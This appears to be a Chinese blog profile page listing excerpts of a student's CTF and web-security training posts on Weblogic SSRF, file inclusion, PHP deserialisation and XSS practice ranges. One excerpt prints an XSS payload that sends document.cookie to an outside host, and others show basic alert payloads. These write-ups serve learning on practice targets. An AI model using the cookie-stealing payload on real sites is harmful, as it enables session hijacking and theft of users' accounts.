自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(8)
  • 收藏
  • 关注

原创 Weblogic ssrf

集训第五周 星期一~二一.首先总结知识点:1.ssrf:服务端请求伪造,好像有三种利用方式,但是我目前就只会最普通的一种,利用SSRF进行端口探测,也是写这道题需要用的。有时候服务端的一个内网中有漏洞,可是我们又没有办法直接访问,所以我们就需要通过服务器,去访问服务器的内网,所以叫服务端请求伪造。有这个漏洞的条件,就是服务器端,需要有与内网传输数据的接口,要不然无法访问内网啊。通常情况下,比...

2019-07-30 15:18:59 2122

原创 实验吧 让我进去

集训第四周 星期五知识点:写CTF题,应该习惯行的看一下源码,扫一下目录,抓一下包打开题后发现一个登陆框,以为是SQL注入,但实际上并不是。然后抓包,在cookie里看见一个东西“source”等于零,让后改成一,发包,看见了源码。$flag = "XXXXXXXXXXXXXXXXXXXXXXX";$secret = "XXXXXXXXXXXXXXX"; // This secret is...

2019-07-26 16:51:08 226

原创 Jarvis OJ Easy Gallery

集训第四周 星期五知识点:1.图片路径可以再页面源代码找到 2.%00可以截断文件按包含的后缀打开题后,扫视了一圈,页面源代码和数据包没有什么提示。于是去看URL,发现有一个page参数,让后想到文件包含漏洞,试了一下,确实可以包含,但是把“://”给过滤了,没法远程包含了,也没有办法用php://伪协议了。然后发现又有一个文件上传界面,应该想到文件上传和文件包含结合的。但是我还是直...

2019-07-26 11:43:48 366

原创 攻防世界 mfw

集训第四周 星期一到星期三星期一序列化的目的是为了将某些对象存储到磁盘上,从而长期保存,例如最常见的是Web服务器中的Session对象,当有 10万用户并发访问,就有可能出现10万个Session对象,内存可能吃不消,于是Web容器就会把一些seesion先序列化到硬盘中,等要用了,再把保存在硬盘中的对象还原到内存中。星期三md5弱比较,为0e开头的会被识别为科学记数法,结果均为0md...

2019-07-24 20:01:41 1933

原创 DVWA XSS 盗取cookie实战

DVWA XSS 盗取cookie实战今天把dvwa的XSS的漏洞又给利用了一下,以前都是弹个框就没了,这次要试试盗cookie。这次说一个东西,很基础的东西,但我也是现在才明白,就是关于html编码,绕过过滤的事情。以前总感觉HTML编码绕过滤,这个方法时灵时不灵,直到现在,才发现原来是自己的问题。这个东西要么用十六进制&#X**,要么用十进制&#ASCLL,我以前竟然傻的直...

2019-07-13 21:12:18 2838 4

原创 XSS配合CSRF的利用 获取cookie

XSS的利用 获取cookie今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。主要就是围绕这句话展开的<script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.cookie</script>1.首先找到XSS漏洞,然后让它可以执行这句话。2.document.loca...

2019-07-11 17:21:49 1047 1

原创 test.xss.tv

集训第二周 星期一(下)下午接着XSS,先放靶场http://test.xss.tv/level1.php?name=testlevel 1这一题也没什么,主要就是找到注入点,让name等于test23,看下页面源码,发现只有一个地方出现了我们输入得东西。于是我们构造payload<script>alert(1)</script>level 2这个我就极其得...

2019-07-09 16:02:08 732

原创 xss.haozi.me

集训第二周 星期一第二个星期了,再发一篇。感觉自己好像没学什么东西。就学了个HTML和JavaScript。今天开始XSS的实战,这篇博客主要就是写一下题解。先给出XSS靶场的地址: https://xss.haozi.me/#/0x00 我是在谷歌上写的,不知道为什么同样的payload在火狐上不能用。0x00第一关应该没什么讲的吧,啥都没有,直接给payload了。<img ...

2019-07-09 09:26:05 5087 3

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除